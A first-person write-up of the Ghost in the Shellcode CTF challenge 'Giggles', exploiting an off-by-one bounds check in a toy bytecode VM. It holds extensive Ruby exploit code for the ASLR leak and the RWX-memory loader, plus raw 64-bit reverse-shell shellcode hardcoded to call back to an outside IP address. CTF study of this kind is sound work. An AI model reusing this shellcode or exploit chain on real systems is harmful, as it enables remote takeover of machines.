Welcome to part 3 of my Ghost in the Shellcode writeup! Sorry for the delay, I actually just moved to Seattle. On a sidenote, if there are any Seattle hackers out there reading this, hit me up and let’s get a drink!
Now, down to business: this writeup is about one of the Pwnage 300 levels; specifically, Giggles, which implements a very simple and very vulnerable virtual machine. You can download the binary here, the source code here (with my comments - I put XXX near most of the vulnerabilities and bad practices I noticed), and my exploit here.
One really cool aspect of this level was that they gave source code, a binary with symbols, and even a client (that’s the last time I’ll mention their client, since I dislike Python :) )! That means we could focus on exploitation and not reversing!
The virtual machine
I’ll start by explaining how the virtual machine actually works. If you worked on this level yourself, or you don’t care about the background, you can just skip over this section.
Basically, there are three operations: TYPE_ADDFUNC, TYPE_VERIFY, and TYPE_RUNFUNC.
The usual process is that the user adds a function using TYPE_ADDFUNC, which is made up of one (possibly zero?) or more operations. Then the user verifies the function, which checks for bounds violations and stuff like that. Then if that succeeds, the user can run the function. The function can take up to 10 arguments and output as much as it wants.
There are only seven different opcodes (types of operations), and one of the tricky parts is that none of them deal with absolute values—only other registers. They are:
- OP_ADD reg1, reg2 - add two registers together, and store the result in reg1
- OP_BR <addr> - branch (jump) to a particular instruction - the granularity of these jumps is actually per-instruction, not per-byte, so you can't jump into the middle of another instruction, which ruined my initial instinct :(
- OP_BEQ <addr> <reg1> <reg2> / OP_BGT <addr> <reg1> <reg2> - branch if equal and branch if greater than are basically the same as OP_BR, except the jumps are conditional
- OP_MOV <reg1> <reg2< - set reg1 to equal reg2
- OP_OUT <reg> - output a register (gets returned as a hex value by RUNFUNC)
- OP_EXIT - terminate the function
To expand on the output just a bit - the program maintains the output in a buffer that’s basically a series of space-separated hex values. At the end of the program (when it either terminates or OP_EXIT is called), it’s sent back to the client. I was initially worried that I would have to craft some hex-with-spaces shellcode, but thankfully that wasn’t necessary. :)
There are 10 different registers that can be accessed. Each one is 32 bits. The operand values, however, are all 64-bit values.
The verification process basically ensures that the registers and the addresses are mostly sane. Once it’s been validated, a flag is switched and the function can be called. If you call the function before verifying it, it’ll fail immediately. If you can use arbitrary bytecode instructions, you’d be able to address register 1000000, say, and read/write elsewhere in memory. They wanted to prevent that.
Speaking of the vulnerability, the bug that leads to full code execution is in the verify function - can you find it before I tell you?
The final thing to mention is arguments: when you call TYPE_RUNFUNC, you can pass up to I think 10 arguments, which are 32-bit values that are placed in the first 8 registers.
Fixing the binary
I’ve gotten pretty efficient at patching binaries for CTFs! I’ve talked about this before, so I’ll just mention what I do briefly.
I do these things immediately, before I even start working on the challenge:
- Replace the call to alarm() with NOPs
- Replace the call to fork() with "xor eax, eax", followed by NOPs
- Replace the call to drop_privs() with NOPs (if I can find it)</li>
That way, the process won’t be killed after a timeout, and I can debug it without worrying about child processes holding onto ports and other irritations. NOPing out drop_privs() means I don’t have to worry about adding a user or running it as root or creating a folder for it. If you look at the objdump outputs diffed, here’s what it looks like:
--- a 2015-01-27 13:30:29.000000000 -0800 +++ b 2015-01-27 13:30:31.000000000 -0800 @@ -1,5 +1,5 @@ -giggles: file format elf64-x86-64 +giggles-fixed: file format elf64-x86-64 Disassembly of section .interp: @@ -1366,7 +1366,10 @@ 125b: 83 7d f4 ff cmp DWORD PTR [rbp-0xc],0xffffffff 125f: 75 02 jne 1263 <loop+0x3d> 1261: eb 68 jmp 12cb <loop+0xa5> - 1263: e8 b8 fc ff ff call f20 <fork@plt> + 1263: 31 c0 xor eax,eax + 1265: 90 nop + 1266: 90 nop + 1267: 90 nop 1268: 89 45 f8 mov DWORD PTR [rbp-0x8],eax 126b: 83 7d f8 ff cmp DWORD PTR [rbp-0x8],0xffffffff 126f: 75 02 jne 1273 <loop+0x4d> @@ -1374,14 +1377,26 @@ 1273: 83 7d f8 00 cmp DWORD PTR [rbp-0x8],0x0 1277: 75 48 jne 12c1 <loop+0x9b> 1279: bf 1e 00 00 00 mov edi,0x1e - 127e: e8 6d fb ff ff call df0 <alarm@plt> + 127e: 90 nop + 127f: 90 nop + 1280: 90 nop + 1281: 90 nop + 1282: 90 nop 1283: 48 8d 05 b6 1e 20 00 lea rax,[rip+0x201eb6] # 203140 <USER> 128a: 48 8b 00 mov rax,QWORD PTR [rax] 128d: 48 89 c7 mov rdi,rax - 1290: e8 43 00 00 00 call 12d8 <drop_privs_user> + 1290: 90 nop + 1291: 90 nop + 1292: 90 nop + 1293: 90 nop + 1294: 90 nop 1295: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] 1298: 89 c7 mov edi,eax
I just use a simple hex editor on Windows, xvi32.exe, to take care of that. But you can do it in countless other ways, obviously.
What's wrong with verifyBytecode()?
Have you found the vulnerability yet?
I’ll give you a hint: look at the comparison operators in this function:
int verifyBytecode(struct operation * bytecode, unsigned int n_ops) { unsigned int i; for (i = 0; i < n_ops; i++) { switch (bytecode[i].opcode) { case OP_MOV: case OP_ADD: if (bytecode[i].operand1 > NUM_REGISTERS) return 0; else if (bytecode[i].operand2 > NUM_REGISTERS) return 0; break; case OP_OUT: if (bytecode[i].operand1 > NUM_REGISTERS) return 0; break; case OP_BR: if (bytecode[i].operand1 > n_ops) return 0; break; case OP_BEQ: case OP_BGT: if (bytecode[i].operand2 > NUM_REGISTERS) return 0; else if (bytecode[i].operand3 > NUM_REGISTERS) return 0; else if (bytecode[i].operand1 > n_ops) return 0; break; case OP_EXIT: break; default: return 0; } } return 1; }
Notice how it checks every operation? It checks if the index is greater than the maximum value. That’s an off-by-one error. Oops!
Information leak
There are actually a lot of small issues in this code. The first good one I noticed was actually that you can output one extra register. Here’s what I mean (grab my exploit if you want to understand the API):
def demo() s = TCPSocket.new(SERVER, PORT) ops = [] ops << create_op(OP_OUT, 10) add(s, ops) verify(s, 0) result = execute(s, 0, []) pp result end
The output of that operation is: “42fd35d8 “
Which, it turns out, is a memory address that’s right after a “call” function. A return address!? Can it be this easy!?
It turns out that, no, it’s not that easy. While I can read / write to that address, effectively bypasing ASLR, it turned out to be some left-over memory from an old call. I didn’t even end up using that leak, either, I found a better one!
The actual vulnerabilitiy
After finding the off-by-one bug that let me read an extra register, I didn’t really think much more about it. Later on, I came back to the verifyBytecode() function and noticed that the BR/BEQ/BGT instructions have the exact same bug! You can branch to the last instruction + 1, where it keeps running unverified memory as if it’s bytecode!
What comes after the last instruction in memory? Well, it turns out to be a whole bunch of zeroes (00 00 00 00…), then other functions you’ve added, verified or otherwise. An instruction is 26 bytes long in memory (two bytes for the opcode, and three 64-bit operands), and the instruction “00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00” actually maps to “add reg0, reg0”, which is nice and safe to do over and over again (although it does screw up the value in reg0).
Aligning the interpreter
At this point, it got a bit complicated. Sure, I’d found a way to break out of the sandbox to run unverified code, but it’s not as straight forward as you might think.
The problem? The spacing of the different “functions” in memory (that is, groups of operations) aren’t multiples of 26 bytes apart, thanks to headers, so if you break out of one function and into another, you wind up trying to execute bytecode that’s somewhat offset.
In other words, if your second function starts at address 0, the interpreter tries to run the bytecode at -12 (give or take). The bytecode at -12 just happens to be the number of instructions in the function, so the first opcode is actually equal to the number of operations (so if you have three operations in the function, the first operation will be opcode 3, or BEQ). Its operands are bits and pieces of the opcodes and operands. Basically, it’s a big mess.
To get this working, I wanted to basically just skip over that function altogether and run the third function (which would hopefully be a little better aligned). Basically, I wanted the function to do nothing dangerous, then continue on to the third function.
Here’s the code I ended up writing (sorry the formatting isn’t great, check out the exploit I linked above to see it better):
# This creates a valid-looking bytecode function that jumps out of bounds, # then a non-validated function that puts us in a more usable bytecode # escape def init() puts("[*] Connecting to #{SERVER}:#{PORT}") s = TCPSocket.new(SERVER, PORT) #puts("[*] Connected!") ops = [] # This branches to the second instruction - which doesn't exist ops << create_op(OP_BR, 1) add(s, ops) verify(s, 0) # This little section takes some explaining. Basically, we've escaped the bytecode # interpreter, but we aren't aligned properly. As a result, it's really irritating # to write bytecode (for example, the code of the first operation is equal to the # number of operations!) # # Because there are 4 opcodes below, it performs opcode 4, which is 'mov'. I ensure # that both operands are 0, so it does 'mov reg0, reg0'. # # After that, the next one is a branch (opcode 1) to offset 3, which effectively # jumps past the end and continues on to the third set of bytecode, which is out # ultimate payload. ops = [] # (operand = count) # |--| |---| <-- inst1 operand1 (0 = reg0) # |--------| |----| <-- inst1 operand2 (0 = reg0) # |--| <-- inst2 opcode (1 = br) # |----| <-- inst2 operand1 ops << create_op(0x0000, 0x0000000000000000, 0x4242424242000000, 0x00003d0001434343) # |--| |----| <-- inst2 operand1 ops << create_op(0x0000, 0x4444444444000000, 0x4545454545454545, 0x4646464646464646) # The values of these don't matter, as long as we still have 4 instructions ops << create_op(0xBBBB, 0x4747474747474747, 0x4848484848484848, 0x4949494949494949) ops << create_op(0xCCCC, 0x4a4a4a4a4a4a4a4a, 0x4b4b4b4b4b4b4b4b, 0x4c4c4c4c4c4c4c4c) # Add them add(s, ops) return s end
The comments explain it pretty well, but I’ll explain it again. :)
The first opcode in the unverified function is, as I mentioned, equal to the number of operations. We create a function with 4 operations, which makes it a MOV instruction. Performing a MOV is pretty safe, especially since reg0 is already screwed up.
The two operands to instruction 1 are parts of the opcodes and operands of the first function. And the opcode for the second instruction is part of third operand in the first operation we create. Super confusing!
Effectively, this ends up running:
mov reg0, reg0 br 0x3d ; [bad instructions that get skipped]
I’m honestly not sure why I chose 0x3d as the jump distance, I suspect it’s just a number that I was testing with that happened to work. The instructions after the BR don’t matter, so I just fill them in with garbage that’s easy to recognize in a debugger.
So basically, this function just does nothing, effectively, which is exactly what I wanted.
Getting back in sync
I hoped that the third function would run perfectly, but because of math, it still doesn’t. However, the operation count no longer matters in the third function, which is good enough for me! After doing some experiments, I determined that the instructions are unaligned by 0x10 (16) bytes. If you pad the start with 0x10 bytes then add instructions as normal, they’ll run completely unverified.
To build the opcodes for the third function, I added a parameter to the add() function that lets you offset things:
#[...] # We have to cleanly exit ops << create_op(OP_EXIT) # Add the list of ops, offset by 10 (that's how the math worked out) add(s, ops, 16) #[...]
Now you can run entirely unverified bytecode instructions! That means full read/write/execute of arbitrary addresses relative to the base address of the registers array. That’s awesome! Because the registers array is on the stack, we have read/write access relative to a stack address. That means you can trivially read/write the return address and leak addresses of the binary, libc, or anything you want. ASLR bypass and RIP control instantly!
Leaking addresses
There are two separate sets of addresses that need to be leaked. It turns out that even though ASLR is enabled, the addresses don’t actually randomize between different connections, so I can leak addresses, reconnect, leak more addresses, reconnect, and run the exploit. It’s not the cleanest way to solve the level, but it worked! If this didn’t work, I could have written a simple multiplexer bytecode function that does all these things using the same function.
I mentioned I can trivially leak the binary address and a stack address. Here’s how:
# This function leaks two addresses: a stack address and the address of # the binary image (basically, defeating ASLR) def leak_addresses() puts("[*] Bypassing ASLR by leaking stack/binary addresses") s = init() # There's a stack address at offsets 24/25 ops = [] ops << create_op(OP_OUT, 24) ops << create_op(OP_OUT, 25) # 26/27 is the return address, we'll use it later as well! ops << create_op(OP_OUT, 26) ops << create_op(OP_OUT, 27) # We have to cleanly exit ops << create_op(OP_EXIT) # Add the list of ops, offset by 10 (that's how the math worked out) add(s, ops, 16) # Run the code result = execute(s, 0, []) # The result is a space-delimited array of hex values, convert it to # an array of integers a = result.split(/ /).map { |str| str.to_i(16) } # Read the two values in and do the math to calculate them @@registers = ((a[1] << 32) | (a[0])) - 0xc0 @@base_addr = ((a[3] << 32) | (a[2])) - 0x1efd # User output puts("[*] Found the base address of the register array: 0x#{@@registers.to_s(16)}") puts("[*] Found the base address of the binary: 0x#{@@base_addr.to_s(16)}") s.close end
Basically, we output registers 24, 25, 26, and 27. Since the OUT function is 4 bytes, you have to call OUT twice to leak a 64-bit address.
Registers 24 and 25 are an address on the stack. The address is 0xc0 bytes above the address of the registers variable (which is the base address of our overflow, and therefore needed for calculating offsets), so we subtract that. I determined the 0xc0 value using a debugger.
Registers 26 and 27 are the return address of the current function, which happens to be 0x1efd bytes into the binary (determined with IDA). So we subtract that value from the result and get the base address of the binary.
I also found a way to leak a libc address here, but since I never got a copy of libc I didn’t bother keeping that code around.
Now that we have the base address of the binary and the address of the registers, we can use the OUT and MOV operations, plus a little bit of math, to read and write anywhere in memory.
Quick aside: getting enough sleep
You may not know this, but I work through CTF challenges very slowly. I like to understand every aspect of everything, so I don’t rush. My secret is, I can work tirelessly at these challenges until they’re complete. But I’ll never win a race.
I got to this point at around midnight, after working nearly 10 hours on this challenge. Most CTFers will wonder why it took 10 hours to get here, so I’ll explain again: I work slowly. :)
The problem is, I forgot one very important fact: that the operands to each operation are all 64-bit values, even though the arguments and registers themselves are 32-bit. That means we can calculate an address from the register array to anywhere in memory. I thought they were 32 bit, however, and since the process is 64-bit Ii’d be able to read/write the stack, but not addresses the binary! That wasn’t true, I could write anywhere, but I didn’t know that. So I was trying a bunch of crazy stack stuff to get it working, but ultimately failed.
At around 2am I gave up and played video games for an hour, then finished the book I was reading. I went to bed about 3:30am, still thinking about the problem. Laying in bed about 4am, it clicked in that register numbers could be 64-bit, so I got up and finished it up for about 7am. :)
The moral of this story is: sometimes it pays to get some rest when you’re struggling with a problem!
+rwx memory!?
The authors of the challenge must have been feeling extremely generous: they gave us a segment of memory that’s readable, writeable, and executable! You can write code to it then run it! Here’s where it’s declared:
void * JIT; // TODO: add code to JIT functions //[...] /* Map 4096 bytes of executable memory */ JIT = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
A pointer to the memory is stored in a global variable. Since we have the ability to read an arbitrary address—once I realized my 64-bit problem—it was pretty easy to read the pointer:
def leak_rwx_address() puts("[*] Attempting to leak the address of the mmap()'d +rwx memory...") s = init() # This offset is always constant, from the binary jit_ptr = @@base_addr + 0x20f5c0 # Read both halves of the address - the read is relative to the stack- # based register array, and has a granularity of 4, hence the math # I'm doing here ops = [] ops << create_op(OP_OUT, (jit_ptr - @@registers) / 4) ops << create_op(OP_OUT, ((jit_ptr + 4) - @@registers) / 4) ops << create_op(OP_EXIT) add(s, ops, 16) result = execute(s, 0, []) # Convert the result from a space-delimited hex list to an integer array a = result.split(/ /).map { |str| str.to_i(16) } # Read the address @@rwx_addr = ((a[1] << 32) | (a[0])) # User output puts("[*] Found the +rwx memory: 0x#{@@rwx_addr.to_s(16)}") s.close end
Basically, we know the pointer to the JIT code is at the base_addr + 0x20f5c0 (determined with IDA). So we do some math with that address and the base address of the registers array (dividing by 4 because that’s the width of each register).
Finishing up
Now that we can run arbitrary bytecode instructions, we can read, write, and execute any address. But there was one more problem: getting the code into the JIT memory.
It seems pretty straight forward, since we can write to arbitrary memory, but there’s a problem: you don’t have any absolute values in the assembly language, which means I can’t directly write a bunch of values to memory. What I could do, however, is write values from registers to memory, and I can set the registers by passing in arguments.
BUT, reg0 gets messed up and two registers are wasted because I have to use them to overwrite the return address. That means I have 7 32-bit registers that I can use.
What you’re probably thinking is that I can implement a multiplexer in their assembly language. I could have some operands like “write this dword to this memory address” and build up the shellcode by calling the function multiple times with multiple arguments.
If you’re thinking that, then you’re sharper than I was at 7am with no sleep! I decided that the best way was to write a shellcode loader in 24 bytes. I actually love writing short, custom-purpose shellcode, there’s something satisfying about it. :)
Here’s my loader shellcode:
# Create some loader shellcode. I'm not proud of this - it was 7am, and I hadn't # slept yet. I immediately realized after getting some sleep that there was a # way easier way to do this... params = # param0 gets overwritten, just store crap there "\x41\x41\x41\x41" + # param1 + param2 are the return address [@@rwx_addr & 0x00000000FFFFFFFF, @@rwx_addr >> 32].pack("II") + # ** Now, we build up to 24 bytes of shellcode that'll load the actual shellcode # Decrease ECX to a reasonable number (somewhere between 200 and 10000, doesn't matter) "\xC1\xE9\x10" + # shr ecx, 10 # This is where the shellcode is read from - to save a couple bytes (an absolute move is 10 # bytes long!), I use r12, which is in the same image and can be reached with a 4-byte add "\x49\x8D\xB4\x24\x88\x2B\x20\x00" + # lea rsi,[r12+0x202b88] # There is where the shellcode is copied to - immediately after this shellcode "\x48\xBF" + [@@rwx_addr + 24].pack("Q") + # mov rdi, @@rwx_addr + 24 # And finally, this moves the bytes over "\xf3\xa4" # rep movsb # Pad the shellcode with NOP bytes so it can be used as an array of ints while((params.length % 4) != 0) params += "\x90" end # Convert the shellcode to an array of ints params = params.unpack("I*")
Basically, the first three arguments are wasted (the first gets messed up and the next two are the return address). Then we set up a call to “rep movsb”, with rsi, rdi, and rcx set appropriately (and complicatedly). You can see how I did that in the comments. All told, it’s 23 bytes of machine code.
It took me a lot of time to get that working, though! Squeezing out every single byte! It basically copies the code from the next bytecode function (whose address I can calculate based on r12) to the address immediately after itself in the +RWX memory (which I can leak beforehand).
This code is written to the +RWX memory using these operations:
ops = [] # Overwrite teh reteurn address with the first two operations ops << create_op(OP_MOV, 26, 1) ops << create_op(OP_MOV, 27, 2) # This next bunch copies shellcode from the arguments into the +rwx memory ops << create_op(OP_MOV, ((@@rwx_addr + 0) - @@registers) / 4, 3) ops << create_op(OP_MOV, ((@@rwx_addr + 4) - @@registers) / 4, 4) ops << create_op(OP_MOV, ((@@rwx_addr + 8) - @@registers) / 4, 5) ops << create_op(OP_MOV, ((@@rwx_addr + 12) - @@registers) / 4, 6) ops << create_op(OP_MOV, ((@@rwx_addr + 16) - @@registers) / 4, 7) ops << create_op(OP_MOV, ((@@rwx_addr + 20) - @@registers) / 4, 8) ops << create_op(OP_MOV, ((@@rwx_addr + 24) - @@registers) / 4, 9)
Then I just convert the shellcode into a bunch of bytecode operators / operands, which will be the entirity of the fourth bytecode function (I’m proud to say that this code worked on the first try):
# Pad the shellcode to the proper length shellcode = SHELLCODE while((shellcode.length % 26) != 0) shellcode += "\xCC" end # Now we create a new function, which simply stores the actual shellcode. # Because this is a known offset, we can copy it to the +rwx memory with # a loader ops = [] # Break the shellcode into 26-byte chunks (the size of an operation) shellcode.chars.each_slice(26) do |slice| # Make the character array into a string slice = slice.join # Split it into the right proportions a, b, c, d = slice.unpack("SQQQ") # Add them as a new operation ops << create_op(a, b, c, d) end # Add the operations to a new function (no offset, since we just need to # get it stored, not run as bytecode) add(s, ops, 16)
And, for good measure, here’s my 64-bit connect-back shellcode:
# Port 17476, chosen so I don't have to think about endianness at 7am at night :) REVERSE_PORT = "\x44\x44" # 206.220.196.59 REVERSE_ADDR = "\xCE\xDC\xC4\x3B" # Simple reverse-tcp shellcode I always use SHELLCODE = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" + "\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" + "\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24" + "\x02" + REVERSE_PORT + "\xc7\x44\x24\x04" + REVERSE_ADDR + "\x48\x89\xe6\x6a\x10" + "\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" + "\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" + "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" + "\x5f\x6a\x3b\x58\x0f\x05"
It’s slightly modified from some code I found online. I’m mostly just including it so I can find it again next time I need it. :)
Conclusion
To summarize everything…
There was an off-by-one vulnerability in the verifyBytecode() function. I used that to break out of the sandbox and run unverified bytecode.
That bytecode allowed me to read/write/execute arbitrary memory. I used it to leak the base address of the binary, the base address of the register array (where my reads/writes are relative to), and the address of some +RWX memory.
I copied loader code into that +RWX memory, then ran it. It copied the next bytecode function, as actual machine code, to the +RWX memory.
Then I got a shell.
Hope that was useful!
Comments
Join the conversation on this Mastodon post (replies will appear below)!
Loading comments...